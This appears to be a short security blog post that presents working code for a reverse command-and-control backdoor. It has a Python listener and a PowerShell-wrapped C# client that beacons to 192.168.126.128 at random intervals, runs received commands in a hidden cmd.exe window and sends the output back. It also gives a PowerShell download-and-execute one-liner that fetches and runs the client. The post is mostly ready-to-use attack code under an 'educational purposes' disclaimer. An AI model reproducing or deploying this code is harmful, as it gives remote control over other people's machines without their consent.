Creating Reverse C2 Channel with C# Powershell and Python

C2 versus Reverse / Bind Shells

Coding Reverse C2

Python C2 Handler (Server)

import socketHOST = "0.0.0.0"
PORT = 443
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
while(True):
print("Listening ...")
conn, addr = s.accept()
with conn:
print(f"Connected by {addr}")
cmd = input("Enter cmd ")
cmd = cmd + '\n'
cmdRequest = cmd.encode()
conn.sendall(cmdRequest)
cmdOutput = conn.recv(1024)
print(cmdOutput)

Powershell C2 Client

$code = @"
using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;
namespace cc
{
public class Program
{
public static void Main()
{
while(true)
{
var seconds = GetRandomSeconds();
Connect("192.168.126.128");
Thread.Sleep(seconds);
}

}
public static string Exec(string cmd)
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = "/c " + cmd;
startInfo.UseShellExecute = false;
process.StartInfo = startInfo;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
return output;
}
public static void Connect(string server)
{
Int32 port = 443;
TcpClient tcpClient = new TcpClient(server, port);
NetworkStream stream = tcpClient.GetStream();var data = new Byte[256];String cmd = String.Empty;Int32 bytes = stream.Read(data, 0, data.Length);
cmd = System.Text.Encoding.ASCII.GetString(data, 0, bytes);
Console.WriteLine(cmd);
var cmdOutput = Exec(cmd);byte[] msg = System.Text.Encoding.ASCII.GetBytes(cmdOutput);stream.Write(msg, 0, msg.Length);stream.Close();
tcpClient.Close();
}
public static int GetRandomSeconds()
{
Random rand = new Random();
return rand.Next(10000);
}
}
}
"@
add-type $code
iex "[cc.Program]::Main()"

Execution

How to reproduce?

Sample payload:powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.126.128/client.ps1')"

Conclusion

P.S I am not responsible for any actions performed with the POC from this blogpost, video links or github repos. You are responsible for your own actions. These materials are ONLY for educational purposes!

--

--

--

OSCP / Ethical Hacker / Vulnerability Researcher / Youtuber https://www.youtube.com/channel/UCFOc80iGpDdO1kMQHeVIFPQ

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Directory/Path Traversal

1. What is eDiscovery?

On Using Password Managers in Harvard

Trusted search engine based on IPFS is booming!

Macy’s Data Breach

Internet Outrage Caused by Verizon Shows How Fragile the Internet Routing Is

The Future Of Fraud

Pay Yourself, Scam Yourself

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Lsec

Lsec

OSCP / Ethical Hacker / Vulnerability Researcher / Youtuber https://www.youtube.com/channel/UCFOc80iGpDdO1kMQHeVIFPQ

More from Medium

How to ssh into GCP using Windows Terminal

Hack.INI 2022 CTF Writeups - Jail Escape Category :

Install PhpMyadmin Ubuntu 20.04 Apache2

Hacking with PowerShell [tryhackme]